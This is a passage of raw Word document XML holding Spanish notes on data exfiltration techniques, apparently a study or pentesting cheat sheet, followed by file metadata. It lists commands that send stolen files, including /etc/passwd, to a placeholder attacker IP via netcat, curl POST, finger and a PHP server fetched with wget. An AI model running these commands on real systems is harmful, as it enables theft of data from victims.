      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &lt;IP víctima&gt; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8000 &gt; datos_robados.txt) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EDCD8C" w14:textId="039C74FA" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t>• Curl: curl -X POST -d @data.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> &lt;IP atacante&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (el atacante escribe nc -lvp 80 &gt; data.txt) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19839DF8" w14:textId="722E0534" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:t>• Finger: finger "$(cat /etc/passwd)@</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;IP atacante&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>" (el atacante escucha en el puerto 79)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50CB01" w14:textId="36D5DA61" w:rsidR="001E7B34" w:rsidRDefault="001E7B34" w:rsidP="001E7B34">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">• Php: php -S 0.0.0.0:8080 (el atacante escribe: wget </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;IP víctima&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>:8080/data.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D7B04" w14:textId="798CF386" w:rsidR="00DD0DF7" w:rsidRPr="001E7B34" w:rsidRDefault="00DD0DF7" w:rsidP="001E7B34">
      <w:r w:rsidRPr="00DD0DF7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F67671F" wp14:editId="6FB0E86F">
            <wp:extent cx="5400040" cy="4932680"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="11820603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60348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05A9" w14:textId="77777777" w:rsidR="00C974AD" w:rsidRPr="00202CBA" w:rsidRDefault="00C974AD" w:rsidP="004A4749"/>
    <w:p w14:paraId="68629B5D" w14:textId="77777777" w:rsidR="00C974AD" w:rsidRPr="00202CBA" w:rsidRDefault="00C974AD" w:rsidP="004A4749"/>
    <w:sectPr w:rsidR="00C974AD" w:rsidRPr="00202C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5D9"/>
    <w:rsid w:val="001E7B34"/>
    <w:rsid w:val="00202CBA"/>
    <w:rsid w:val="00443106"/>
    <w:rsid w:val="004A4749"/>
    <w:rsid w:val="007A44FD"/>
    <w:rsid w:val="008215D9"/>
    <w:rsid w:val="00C974AD"/>
    <w:rsid w:val="00DD0DF7"/>
    <w:rsid w:val="00E73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71838"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4BD24E34-E8AF-48BE-B9F3-60F6695D0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215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215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215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215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215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215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215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215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215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215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215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215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215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215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215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215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215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215D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215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215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215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215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215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215D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215D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215D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215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215D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215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1059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Iyán Fernández</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Iyán Fernández</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-28T09:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-28T11:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>